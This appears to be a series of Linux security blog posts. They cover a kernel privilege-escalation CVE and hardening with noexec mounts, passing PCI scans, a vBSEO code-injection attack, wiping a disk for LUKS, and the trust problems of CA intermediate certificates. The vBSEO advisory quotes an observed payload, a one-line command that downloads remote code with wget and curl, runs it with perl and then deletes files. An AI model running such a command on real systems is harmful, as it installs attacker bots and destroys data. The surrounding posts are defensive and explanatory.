CVE-2013-2094: Linux Root Privilege Escalation Attack

On May 14th an attack in the wild began circling which enables non-root users to become root for kernels 2.6.37–3.8.8 (inclusive) compiled with PERF_EVENTS, in addition to cirtain earlier kernels containing the bug as a backport. This only affects 64-bit operating systems.  This is the best technical writeup I have seen on the subject: CVE-2013-2094 Perf Events Exploit Explained

Ubuntu 10.04 is not affected.
RHEL 5 are not affected.
Debian Squeeze is not affected.

Known Vulnerable Distributions and Kernel Versions

NOTE: You are extra-vulnerable if you have untrusted non-root users on your server!

CentOS/RHEL kernels earlier than 2.6.32-358.6.2
If you can’t reboot, try this fix:

Ubuntu 12.04 3.2 kernels earlier than 3.2.0-43.68
Ubuntu 12.04 3.5 kernels earlier than 3.5.0-30.51~precise1
Ubuntu 12.10 3.5 kernels earlier than 3.5.0-30.51
Ubuntu 13.04 3.8 kernels earlier than 3.8.0-21.32

Debian Wheezy 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian Jessie 3.2 kernels earlier than 3.2.41-2+deb7u2
Debian unstable 3.8 kernels earlier than 3.8.11-1

There may be other back-ported kernels which have this vulnerability, so if in doubt, update your kernel!

Tightening CentOS/RHEL Security

While there is far more to hardening a server than this single example, this is an often overlooked security issue in many default installations of RHEL and RHEL-based distributions (CentOS, Scientific Linux, etc.)

CentOS and RHEL come with the isdn4k-utils and coolkey packages installed by default for graphical workstations.  Unfortunately, these packages create world-writable directories which binaries and scripts may execute from.  While it is common to tighten /tmp, /var/tmp and /usr/tmp against execution attacks, these directories often go un-noticed.

If you do not use these utilities (and few servers do), they can be easily removed:

yum remove isdn4k-utils coolkey

Of course if you are using these, then you should find a way to secure these mountpoints with the noexec mount option.  This can be done with a loopback filesystem mounted atop the offending mountpoints or with separate LVM volumes for each.

Traditionally, /var does not run executable code so you could mount the entire /var mountpoint as noexec.  Its a great security practice if you can support this, however, there are some packages which expect to run their update scripts out of /var/tmp/ so be prepared to fix some broken package updates or installations.  When you do have a package error, simply mount /var as executable:

mount -o remount,rw,exec /var

install the package, and then disable execution on the mountpoint:

mount -o remount,rw,noexec /var

I recommend nosuid and nodev mount options for these types of mount points as well to restrict less common attack vectors.


Linux PCI Compliance: Passing the Scan

PCI Compliance Introduction

PCI compliance is required by the credit card card processing industry.  If you are a merchant provider, no doubt you have been contacted by a PCI compliance scanning vendor of some form, generally sponsored by your bank or merchant provider.

Passing a PCI compliance scan is not too difficult, though there are a few technical hurdles to pass.


Server and Network Scanning

Generally speaking, you are required to answer an (excessively) long series of security questions, many of which may have no relation to your business.  Further, they obtain your server IP addresses and scan your systems for security vulnerabilities.

The report format varies, but generally you receive a brief technical description for each item, usually linked to the CVE “Common Vulnerabilities and Exposures” database.  If you are technically inclined or have technical staff who understand what should be changed to pass the scan, then you can generally resolve this internally.

If not, then unfortunately the scanning vendors do not offer support when a compliance scan fails and you are left to your own devices.


Passing the PCI Compliance Scan for Linux

Keep in mind that the purpose of passing a scan isn’t just to pass: passing the scan means your server meets a minimum baseline security level for operation on the public Internet.  Not only will your merchant provider be tickled by your compliance, but your server will be more secure for the effort.

There are a series of general security practices that you can follow which will help you pass your scan and increase server security at the same time:

  • Run only the services which are absolutely necessary for your server’s operation
  • Install distribution package and security updates
  • Configure a firewall to minimize the scan surface available to the scanner or to an attacker
  • Use SSL certificates signed by a reputable certificate authority
  • Make sure intermediate SSL certificates are installed
  • Configure your SSL framework to force strong cryptographic ciphers
  • Be certain that the domain being scanned matches the common name on the certificates.  For example: if your SSL certificate is but your website is, then you will probably fail the PCI scan.
  • Use your web server’s document root for a single purpose.  For example, develop your new shiny website on a different or internal domain, not in the “/dev” or “/new” directory on your production site.
  • Make sure your web application is up to date—especially if your site is based on an old version of an open-source content management system such as WordPress or Joomla.
  • Dedicate one server per application function.  For example, have mail on a dedicated mail server, web on a dedicated web server.  Running both services on the same machine increases your security exposure and makes it more difficult to pass your PCI scan.

If you have followed these practices and are still having trouble passing your scan—or just want to increase your server’s security—then give me a call.  I’m always happy to help!




vBulletin and vBSEO Exploit: Attacks in the Wild

We are seeing the use of this exploit in the wild:

BSEO <= 3.6.0 “proc_deutf()” Remote PHP Code Injection

Its been patched for over a year, but someone has automated scanning for vbseocp.php and hosts are getting compromised.

The fix is to update vBSEO to the latest version, and the source of the attack lives here: ./vbseo/includes/functions_vbseocp_abstract.php with improper escaping of the char_repl POST parameter.  This is vulnerable whether or not you have register_globals enabled.

The attack we are seeing takes the form of:

cd /tmp;wget ftp://user:pass@host/;curl -O ftp://user:pass@host/;perl;rm -rf

We have seen two distinct payloads: an IRC c&c bot and a spam engine executing from /tmp/.  The IRC bot sets its name as /usr/local/sbin/httpd to appear benign and makes outbound IRC connections.

If you think you may be infected, contact us as soon as possible so we can get this removed and locked down.  Our standard countermeasures would have prevented this attack even on unpatched hosts.


Quickly fill a disk with random bits (without /dev/urandom)

When an encrypted medium is prepared for use, it is best practice to fill the disk end-to-end with random bits.  If the disk is not prepared with random bits, then an attacker could see which blocks have and have not been written, simply by running a block-by-block statistical analysis:  if the average 1/0 ratio is near 50%, its probably encrypted.  It may be simpler than this for new disks, since they tend to default with all-zero’s.

This is a well-known problem, and many will encourage you to use /dev/urandom to fill the disk.  Unfortuntaly, /dev/urandom is much slower than even rotational disks, let-alone GB/sec RAID on SSD’s:

root@geekdesk:~# dd if=/dev/urandom of=/dev/null bs=1M count=100
100+0 records in
100+0 records out
104857600 bytes (105 MB) copied, 7.24238 s, 14.5 MB/s

So how can we fill a block device with random bits, quickly?  The answer might be surprising:  we use /dev/zero—but write to the encrypted device.  Once the encrypted device is full, we erase the LUKS header with /dev/urandom.  The second step is of course slower, but we need only overwrite the first 1MB so it takes a fraction of a second.

Note that the password we are using (below) needn’t be remembered—in fact, you shouldn’t be able to remember it.  Use something long and random for a password, and keep it just long enough to erase the volume.  I use base64 from /dev/urandom for password generation:

# 256 random bits
dd if=/dev/urandom bs=1 count=32 | base64

Now format the volume and map it with luksOpen.  Note that we are not using a filesystem—this is all at block-layer:

root@geekdesk:~# cryptsetup luksFormat /dev/loop3
This will overwrite data on /dev/loop3 irrevocably.
Are you sure? (Type uppercase yes): YES
Enter LUKS passphrase: <random one-time-use password>
Verify passphrase:
root@geekdesk:~# cryptsetup luksOpen /dev/loop3 testdev
Enter passphrase for /dev/loop3: <same password as above>

root@geekdesk:~# dd if=/dev/zero of=/dev/mapper/testdev bs=1M
dd: writing `/dev/mapper/testdev': No space left on device
99+0 records in
98+0 records out
103804928 bytes (104 MB) copied, 1.21521 s, 85.4 MB/s

See, more than 6x faster (the disk is most likely the 85MB/s bottleneck)!  This will save hours (or days) when preparing multi-terabyte volumes.  Now remove the device mapping, and urandom the first 1MB of the underlying device:

# This line is the same as "cryptsetup luksClose testdev"
root@geekdesk:~# dmsetup remove /dev/mapper/testdev
root@geekdesk:~# dd if=/dev/urandom of=/dev/loop3 bs=512 count=2056
2056+0 records in
2056+0 records out
1052672 bytes (1.1 MB) copied, 0.0952705 s, 11.0 MB/s

Note that we overwrote the first 2056 blocks from /dev/urandom.  2056 is the default LUKS payload offset, but you can verify that you’ve overwritten the correct number of blocks using luksDump:

root@geekdesk:~# cryptsetup luksDump /dev/loop3
LUKS header information for /dev/loop3

Version:           1
Cipher name:       aes
Cipher mode:       cbc-essiv:sha256
Hash spec:         sha1
Payload offset:    2056   [...snip...]

Now your volume is prepared with random bits, and you may format it with any cryptographic block-device mechanism you prefer, safe knowing that an attacker cannot tell which blocks are empty, and which are in use (assuming the attacker has a single point-in-time copy of the block device).

I like LUKS since it is based on PKCS#11 and includes features such multiple passphrase slots and passphrase changes (it never reveals the actual device key, your passphrase unlocks the real key), but other volume encryption devices exist—or you might export the volume via iSCSI/ATAoE/FCoE and use a proprietary block-layer encryption mechanism.

If someone can explain an attack against this mechanism, I would be glad to hear about it.  In this example we used AES in CBC mode so we are spreading the IV bits across the entire volume.  Conceivably one could write an AES-CTR mode tool with a random key to do the same thing and this may be a stronger mechanism.  (To my knowledge, the dm-crypt toolchain does not have a CTR mode, nor would you want one for general use).

The method above fails when an attacker can tell the difference between the original AES-CBC wipe with random bits (where all plaintext bits are set to zero)—and the new encryption mechanism with a different key that will be used in production atop of the prepared disk volume.  While there may be an attack for AES-CBC with all-zero’s (though I don’t think there is), AES-CTR mode by its definition would make this method more effective since each block is independent of the next.  One might be able to argue that AES-CBC creates an AES-CTR mode implementation where the counter is a permutation of AES itself.  If this can be proven, then both methods are equally secure.

Either way, this is likely better (and definitely faster) than /dev/urandom for filling a disk, since /dev/urandom is a pseudo-random number generator.  Using /dev/urandom for terabytes of data may begin to develop a pattern once its effective entropy pool is spread too thin.  Even with seed-help from /dev/random, /dev/urandom might run out of steam.

In the end, random bits XORed with random bits still look like random bits when placed next to other random bits—but you’re welcome to debate this.  Yay for crypto!

ok, now back to work 🙂


Edit: Mon Sep 17 19:43:22 PDT 2012
Come to think of it, you don’t even need a password at the luksFormat stage.  LUKS generates its own strong random bits for the actual block-cipher key.  The passphrase just unlocks that key.  For the purposes of wiping the disk with random bits, you can use “<enter><enter>” as your passphrase… just make sure you wipe the LUKS header in step 2 from /dev/urandom.

Linux and Open Source: Internet Security and Vulnerability Disclosure

Internet attacks and vulnerabilities are increasingly held secret and sold to the highest bidder.  Unfortunately, this encourages developers to hide back doors and seel them on the open (black/grey) market.   This compromises the security of the Internet at large, and our personal security as well.

Open-source software provides the ability for many eyes to publicly vet the security of software, particularly when software patch commits are audited by more than one person.  While open-source software may not solve the problem, the open philosophy provides a community for public code review.  Certainly a closed-source backdoor would be more difficult to detect than an open-source backdoor—though I am sure others may debate my argument.

I encourage you to read Bruce Schneier’s most recent Crypto Gram for further discussion on this topic:

The Vulnerabilities Market and the Future of Security


A call—and hang-up, from a root-signing CA

Fri Oct 8 13:34:11 PDT 2010

Today I received an interesting call from a well-known Signing CA. One of my SSL certificates was soon to expire, and they called looking for my business. I spoke with them briefly, genuinely interested in their service, and the sales rep hung up on me when I asked a specific question.

You see, certificate authorities (CAs) have “sales spiders” that crawl the web looking for soon-to-expire certificates to renew using a competing CA. There are many out there, and I expressed some of the challenges with Trust on the Internet in my previous post.

When the CA called the first time, I barely missed the call, and immediately called the number back, not knowing who had called. I introduced myself politely and was greeted politely by the the CA sales rep. I could hear the call-center chatter of keyboards and whisper of voices in the background. He explained to me how certificates work, why you would want one from the CA, and I learned something interesting: It is much easier to get a root-signing certificate than I had thought.

There are (depending on who you ask) three “levels” of trust in certificates:

  • Domain Validation (DV)
  • Organization Validation (OV)
  • Extended Validation (EV)

The Padlock: Domain Validation simply verifies that the certificate presented by a server to which you connect. This is the least intensive validation, and also the least expensive. They simply make sure that an email address at that domain (like can validate that the domain exists, and that the person requesting the SSL certificate actually manages the domain.

The Gold Padlock: Organization Validation is a bit more intense, and you must submit your business entity record (eg, Articles of Incorporation) for verification. The sales rep informed me that some phishing sites have managed to get the “Gold Padlock OV validation” and that one really needs an EV certificate to be trusted on the Internet.

The Green Bar and Padlock: According to the the CA Sales rep, for extended validation, they actually pull a Dunn & Bradstreet report (which costs $45 from D&B) and verify your entities existence, external to the business registration papers that you might submit (depending on the CA) for the OV version of a certificate. This is the certificate the the CA rep wished to sell.

So I asked if the CA issues root-signing certificates, to which he did not understand and began talking about code signing certificates (which are similar, but completely unrelated). When he paused for a moment, I asked again, explaining what I meant: “No”, I said, “I mean—do you offer a root-signing services such that you would offer a signed intermediate ceritificate for large organizations to sign domain names for their organization?”

There was a pause.

He mumbled something to pass time and I heard the clatter of fingers on a keyboard which could only be an uncertain sales rep quickly looking for an answer by posting a question on a sales-rep “IRC” channel for “silently” asking questions of the guys that know the answers when he does not have one himself.

After another moment, he said that intermediate root-signing certificates are available for a $20,000 deposit.

“Great!”, I said, “and what form of validation do you perform to guarantee that the recipient is who they say they are? Is it a more intense validation than the EV validation?” “No, no”, he said: “Intermediate root-signing certificates are only audited at the OV level, perhaps a bit more—but not as intense as the EV”.

So I said: “doesn’t that mean that anyone with $20,000 can get a root-signing certificate and sign what they wish?” He agreed, but said “if they have $20,000 they must be a serious business”. I pushed on: “So, any institution could ‘deposit’ $20,000 for an intermediate signing certificate—that the CA would verify—and that institution could then sign any certificate with any name, effectively enabling a man-in-the-middle attack for any domain?—–

Not even a click. He was gone. I dialed the number back (remember he quickly answered last time) and found some pretty string quartet hold music, but no recording except after 5 minutes, a place to leave your phone number; I did, and I do not expect a call back. Fascinating!

A thought to ponder for the reader: Can EV domains be trusted more than OV domains when an OV-validated intermediate-signed certificate can forge EV certificates? I suspect they can, but I would like to be proven wrong.


Circumventing Privacy, the “legal” way.

I strong recommend reading, or at least skimming:

I have known this attack is possible for some time—and have even performed this attack in consentual environments without an intermediate certificate.

These types of attacks are simple to implement in principle, but difficult to execute because root certificates are well controlled by root certificate authorities. This is changing, however, since well-known certificate authorities will provide signed intermediate certificates for a price—or—perhaps a writ from a judge. I will compile CAs providing this service on this blog entry as I find them. For now, this is a start:

With that, I recommend the use of Certificate Patrol to be aware of the problem; Certificate Patrol is also available here.

Update Thu Sep 23 22:53:25 PDT 2010 

I find it interesting that Google is now a CA that my browser trusts:

Click here and view the certificate rendered:

This is not good, bad, or otherwise. It simply shows the state of trust on the Internet. Google can sign any “common name” into existence and have it trusted by all modern browsers.
